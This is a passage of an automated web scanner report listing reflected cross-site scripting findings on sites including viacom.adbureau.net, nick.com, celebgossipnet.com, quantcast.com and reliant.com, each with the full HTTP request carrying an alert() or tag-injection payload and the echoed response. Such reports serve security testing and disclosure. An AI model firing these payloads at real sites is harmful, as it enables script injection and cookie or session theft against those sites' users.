Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>

<script type="text/javascript">

var payload5232,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
Str = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000/heightb8664';alert(1)//206b76984df=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5232';

/* Try to get the wi
...[SNIP]...

1.208. http://viacom.adbureau.net/hserver/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://viacom.adbureau.net
Path:	/hserver/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45dab'%3balert(1)//db90a13c1e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45dab';alert(1)//db90a13c1e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1?45dab'%3balert(1)//db90a13c1e1=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004818DF4480D8569BB5B6461626364; LE0=+5O4z5sqcF+314+4; LE4=+5O4z5sKq+414+8WHqNOJQ.+3Cm+4; AA002=1297806090-11017856

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Sun, 20 Mar 2011 13:07:48 GMT
X-DirectServer: viacom_DS14
Content-Type: text/html
Content-Length: 2298
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>

<script type="text/javascript">

var payload5232,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...

if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1?45dab';alert(1)//db90a13c1e1=1&relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5232';

/* Try to get the width and height from AAMLib first */
/
...[SNIP]...

1.209. http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://viacom.adbureau.net
Path:	/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a3e6'%3balert(1)//05035dab63c was submitted in the REST URL parameter 1. This input was echoed as 6a3e6';alert(1)//05035dab63c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver6a3e6'%3balert(1)//05035dab63c/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004818DF4480D8569BB5B6461626364; LE0=+5O4z5sqcF+314+4; LE4=+5O4z5sKq+414+8WHqNOJQ.+3Cm+4; AA002=1297806090-11017856

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Sun, 20 Mar 2011 13:07:45 GMT
X-DirectServer: viacom_DS22
Content-Type: text/html
Content-Length: 2291
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>

<script type="text/javascript">

var payload4924,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tempStr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=0000133c00000000000000006a3e6';alert(1)//05035dab63c/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload4924';

/* Try to get t
...[SNIP]...

1.210. http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://viacom.adbureau.net
Path:	/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12064'%3balert(1)//6445d771e8f was submitted in the REST URL parameter 2. This input was echoed as 12064';alert(1)//6445d771e8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/height12064'%3balert(1)//6445d771e8f=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004818DF4480D8569BB5B6461626364; LE0=+5O4z5sqcF+314+4; LE4=+5O4z5sKq+414+8WHqNOJQ.+3Cm+4; AA002=1297806090-11017856

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Sun, 20 Mar 2011 13:07:47 GMT
X-DirectServer: viacom_DS21
Content-Type: text/html
Content-Length: 2291
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>

<script type="text/javascript">

var payload4924,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
Str = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height12064';alert(1)//6445d771e8f=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload4924';

/* Try to get the widt
...[SNIP]...

1.211. http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://viacom.adbureau.net
Path:	/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c3da'%3balert(1)//4130ffc98a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c3da';alert(1)//4130ffc98a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1?8c3da'%3balert(1)//4130ffc98a5=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004818DF4480D8569BB5B6461626364; LE0=+5O4z5sqcF+314+4; LE4=+5O4z5sKq+414+8WHqNOJQ.+3Cm+4; AA002=1297806090-11017856

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Sun, 20 Mar 2011 13:07:42 GMT
X-DirectServer: viacom_DS22
Content-Type: text/html
Content-Length: 2294
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>

<script type="text/javascript">

var payload4924,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
;
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1?8c3da';alert(1)//4130ffc98a5=1&relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload4924';

/* Try to get the width and height from AAMLib first */
/
...[SNIP]...

1.212. http://www.celebgossipnet.com/ [c2c36scriptalert parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.celebgossipnet.com
Path:	/

Issue detail

The value of the c2c36scriptalert request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2660f"><script>alert(1)</script>7f070fff364 was submitted in the c2c36scriptalert parameter. This input was echoed as 2660f\"><script>alert(1)</script>7f070fff364 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c2c36scriptalert2660f"><script>alert(1)</script>7f070fff364 HTTP/1.1
Host: www.celebgossipnet.com
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-485061537-1300626391651; __utmz=205167490.1300626399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=7083869468851009847; __utma=205167490.381782026.1300626399.1300626399.1300626399.1; __utmc=205167490; __utmb=205167490.9.10.1300626399; PHPSESSID=q9ojc08mjjsm7hocfn6buqkh15

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:34:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.celebgossipnet.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 111109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xf
...[SNIP]...
<a href="http://www.celebgossipnet.com/page/2/?c2c36scriptalert2660f\"><script>alert(1)</script>7f070fff364">
...[SNIP]...

1.213. http://www.celebgossipnet.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.celebgossipnet.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2c36"><script>alert(1)</script>46053ce0517 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2c36\"><script>alert(1)</script>46053ce0517 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c2c36"><script>alert(1)</script>46053ce0517=1 HTTP/1.1
Host: www.celebgossipnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:17:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=3uq7jnbbq48q0gma13u8l87i91; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.celebgossipnet.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 111039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xf
...[SNIP]...
<a href="http://www.celebgossipnet.com/page/2/?c2c36\"><script>alert(1)</script>46053ce0517=1">
...[SNIP]...

1.214. http://www.nick.com/sbcom/data/json/next-on.jhtml [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nick.com
Path:	/sbcom/data/json/next-on.jhtml

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 26f21<script>alert(1)</script>01aa7cd6925 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sbcom/data/json/next-on.jhtml?callback=NICK.request.lstnrs[%22wwwnickcomsbcomdatajsonnextonjhtml1%22]26f21<script>alert(1)</script>01aa7cd6925&_=1300629912262&channelID=53&seriesID=30969 HTTP/1.1
Host: www.nick.com
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/shows/the-nightlife
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: eda0b1681a1e85a01f8fe3fcef37b01d
Last-Modified: Sun, 20 Mar 2011 14:05:06 GMT
Content-Length: 140
Content-Type: text/html
Cache-Control: max-age=60
Date: Sun, 20 Mar 2011 14:05:06 GMT
Connection: close
Vary: Accept-Encoding

NICK.request.lstnrs["wwwnickcomsbcomdatajsonnextonjhtml1"]26f21<script>alert(1)</script>01aa7cd6925({"code":"ok","data":{"schedule":[

]}})

1.215. http://www.nick.com/sbcom/data/json/poll_to_json.jhtml [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nick.com
Path:	/sbcom/data/json/poll_to_json.jhtml

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ade93<script>alert(1)</script>e0d9662de93 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sbcom/data/json/poll_to_json.jhtml?callback=NICK.request.lstnrs[%22wwwnickcomsbcomdatajsonpoll_to_jsonjhtml1%22]ade93<script>alert(1)</script>e0d9662de93&_=1300629912260 HTTP/1.1
Host: www.nick.com
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/shows/the-nightlife
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 219
Content-Type: text/html
Set-Cookie: app-instance=nick-com-1-kids-jboss-020; Path=/
Set-Cookie: server=rugrats3; Domain=.nick.com; Path=/
Set-Cookie: MTV_ID=24.143.206.71.1300629906605; Domain=.nick.com; Expires=Wed, 17-Mar-2021 14:05:06 GMT; Path=/
Set-Cookie: JSESSIONID=C4B4E47663D891F00AC9044C9E7BA6CB.kids-jboss-020-811-mtvi-com-28851; Path=/
MTVi-Edge-control: no-cache-downstream
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 14:05:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:05:06 GMT
Connection: close

NICK.request.lstnrs["wwwnickcomsbcomdatajsonpoll_to_jsonjhtml1"]ade93<script>alert(1)</script>e0d9662de93({"code":"ok","voteSubmitted":"false","data":[

{"name":"null","texts":["null","null","null"],"ballots":[

]}]});

1.216. http://www.quantcast.com/123greetings.com [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/123greetings.com

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d58a8"><a>b41d7a1ca74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /123greetings.comd58a8"><a>b41d7a1ca74 HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; JSESSIONID=0757DB1C39785A4257EEAAAF831CC8BA; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); qcPageID=0; __utma=14861494.1792645891.1297862294.1300542320.1300624433.14; __utmc=14861494; __utmb=14861494.6.8.1300624434708; __qca=P0-1138661367-1297862290557; qcVisitor=2|47|1297862270597|117|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8AFB21C2F85A6F9D9739433CD1F2692F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 20 Mar 2011 14:00:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" 123greetings.comd58a8"><a>b41d7a1ca74" />
...[SNIP]...

1.217. http://www.quantcast.com/4chan.org [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/4chan.org

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e63df"><a>9740d3549e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /4chan.orge63df"><a>9740d3549e4 HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; JSESSIONID=0757DB1C39785A4257EEAAAF831CC8BA; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); qcPageID=0; __utma=14861494.1792645891.1297862294.1300542320.1300624433.14; __utmc=14861494; __utmb=14861494.6.8.1300624434708; __qca=P0-1138661367-1297862290557; qcVisitor=2|47|1297862270597|117|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5EB387AD4958F927DF243672C9FACB7A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 20 Mar 2011 14:00:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" 4chan.orge63df"><a>9740d3549e4" />
...[SNIP]...

1.218. http://www.reliant.com/en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp [bc968'-alert(1)-'fdd40018f76 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reliant.com
Path:	/en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp

Issue detail

The value of the bc968'-alert(1)-'fdd40018f76 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38f62'-alert(1)-'084d45b0e04 was submitted in the bc968'-alert(1)-'fdd40018f76 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp?bc968'-alert(1)-'fdd40018f76=138f62'-alert(1)-'084d45b0e04&msg_code=|browser_support HTTP/1.1
Host: www.reliant.com
Proxy-Connection: keep-alive
Referer: http://www.reliant.com/en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp?bc968'-alert(1)-'fdd40018f76=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_chronicle_id=090175228036daba; s_evar37cvp=%5B%5B'Other%20Referrers'%2C'1300629988532'%5D%5D; UserSessionFilterCookieID=034963EA-6D06-813D-075B-8E82E4044CB2; JSESSIONID=1B8C124B67648A1F1E86C49895CBE245; language_code=en_US; site_location=Shop; CurrentAccountSegment=Generic; mbox=check#true#1300630059|session#1300629987035-862457#1300631859; s_cc=true; s_nr=1300629998336-New; s_evar17=9%3A00AM; s_evar18=Sunday; s_evar19=Weekend; c=undefinedburpburp; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 20 Mar 2011 14:07:08 GMT
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-cookie: language_code=en_US; Domain=.reliant.com; Path=/
Set-cookie: i_chronicle_id=090175228036e945
Set-cookie: site_location=Shop; Domain=.reliant.com; Path=/
Set-cookie: CurrentAccountSegment=Generic; Domain=.reliant.com; Path=/
Content-type: text/html;charset=utf-8
Via: 1.1 https-www.reliant.com
Proxy-agent: Oracle-iPlanet-Web-Server/7.0
Content-Length: 81913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd
...[SNIP]...
kProtocol() {
var aForm = window.document.forms[0]
var protocol = "http"
if (protocol == "http" || protocol == "HTTP") {
aForm.action = 'http://nullnull?bc968'-alert(1)-'fdd40018f76=138f62'-alert(1)-'084d45b0e04&msg_code=|browser_support'
aForm.submit();
}
}
function addleadingZero(str)
       {
            var numbr ="";
            if (str.length < 2 ) {
               numbr = "0" + str
            } else {
               nu
...[SNIP]...

1.219. http://www.reliant.com/en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp [bc968'-alert(document.cookie)-'fdd40018f76 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reliant.com
Path:	/en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp

Issue detail

The value of the bc968'-alert(document.cookie)-'fdd40018f76 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba640'-alert(1)-'e519f06da9d was submitted in the bc968'-alert(document.cookie)-'fdd40018f76 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp?bc968'-alert(document.cookie)-'fdd40018f76=1ba640'-alert(1)-'e519f06da9d&msg_code=|browser_support HTTP/1.1
Host: www.reliant.com
Proxy-Connection: keep-alive
Referer: http://www.reliant.com/en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp?bc968'-alert(document.cookie)-'fdd40018f76=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_chronicle_id=090175228036e945; UserSessionFilterCookieID=730AC166-140D-01EA-2789-A816B0F33610; JSESSIONID=F3E703A189A9026310F9CC3DA2E5179F; language_code=en_US; site_location=Shop; CurrentAccountSegment=Generic; mbox=check#true#1300630048|session#1300629987035-862457#1300631848; s_cc=true; s_nr=1300629988527-New; s_evar17=9%3A00AM; s_evar18=Sunday; s_evar19=Weekend; c=undefinedburpburp; s_evar37cvp=%5B%5B'Other%20Referrers'%2C'1300629988532'%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 20 Mar 2011 14:07:01 GMT
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-cookie: JSESSIONID=4EC3EC49B4FB9F52451FB9B7BB51D593; Path=/
Set-cookie: language_code=en_US; Domain=.reliant.com; Path=/
Set-cookie: i_chronicle_id=090175228036e945
Set-cookie: site_location=Shop; Domain=.reliant.com; Path=/
Set-cookie: CurrentAccountSegment=Generic; Domain=.reliant.com; Path=/
Pragma: no-cache
Content-type: text/html;charset=utf-8
Via: 1.1 https-www.reliant.com
Proxy-agent: Oracle-iPlanet-Web-Server/7.0
Content-Length: 81927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd
...[SNIP]...

var aForm = window.document.forms[0]
var protocol = "http"
if (protocol == "http" || protocol == "HTTP") {
aForm.action = 'http://nullnull?bc968'-alert(document.cookie)-'fdd40018f76=1ba640'-alert(1)-'e519f06da9d&msg_code=|browser_support'
aForm.submit();
}
}
function addleadingZero(str)
       {
            var numbr ="";
            if (str.length < 2 ) {
               numbr = "0" + str
            } else {
               nu
...[SNIP]...

1.220. http://www.reliant.com/en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp [msg_code parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reliant.com
Path:	/en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp

Issue detail

The value of the msg_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8613'%3balert(1)//5c7352ce38c was submitted in the msg_code parameter. This input was echoed as e8613';alert(1)//5c7352ce38c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp?bc968'-alert(document.cookie)-'fdd40018f76=1&msg_code=|browser_supporte8613'%3balert(1)//5c7352ce38c HTTP/1.1
Host: www.reliant.com
Proxy-Connection: keep-alive
Referer: http://www.reliant.com/en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp?bc968'-alert(document.cookie)-'fdd40018f76=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
